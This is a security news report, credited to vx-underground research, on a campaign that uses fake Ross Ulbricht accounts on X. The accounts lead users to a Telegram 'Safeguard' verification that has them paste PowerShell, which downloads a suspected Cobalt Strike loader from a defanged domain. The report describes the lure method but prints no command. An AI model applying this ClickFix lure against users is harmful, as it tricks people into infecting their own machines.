Fake Ulbricht Account. Source: vx-underground
Malicious actors on the platform X (formerly Twitter) are exploiting recent news about Ross Ulbricht to lure users into a fraudulent Telegram channel. Once there, victims are instructed to execute PowerShell commands, which infect their devices with malware.
The attack, uncovered by researchers at vx-underground, represents a novel variation of the “Click-Fix” tactic, frequently used to distribute malware. In this instance, the attackers forgo “bug fixes” and instead deploy a fake CAPTCHA or verification system, which compels users to execute code under the guise of confirmation.
Previously, experts at Guardio Labs and Infoblox had reported a campaign in which users were prompted to run PowerShell commands disguised as CAPTCHA verification to prove they were not bots.
Ross Ulbricht, the founder of the infamous darknet platform Silk Road, serves as the bait in this campaign. Silk Road functioned as a hub for trading illegal goods and services. In 2015, Ulbricht was sentenced to life imprisonment, a punishment that sparked widespread debate over its severity. This week, Donald Trump fulfilled a previous promise by signing an executive order to pardon Ulbricht.
Capitalizing on this event, the attackers created fake Ulbricht accounts on X and directed users to fraudulent Telegram channels masquerading as official portals.
On Telegram, the scammers orchestrate a sham verification process titled “Safeguard.” The process involves using a Telegram mini-application that copies malicious PowerShell code to the device’s clipboard and persuades users to paste and execute it in the Windows command line.
Upon execution, the command downloads and launches a PowerShell script that retrieves a ZIP archive from http://openline[.]cyou. This archive contains a malicious file, identity-helper.exe, which is suspected to act as a loader for Cobalt Strike. Cobalt Strike is a tool often employed by hackers to gain remote access to systems and networks, commonly preceding ransomware attacks and data theft.
The attackers deliberately use sophisticated language and persuasive phrasing to ensure their victims remain unsuspecting.
Never execute commands copied from the internet without thoroughly analyzing their content. If the text includes obfuscation, it should immediately raise red flags.
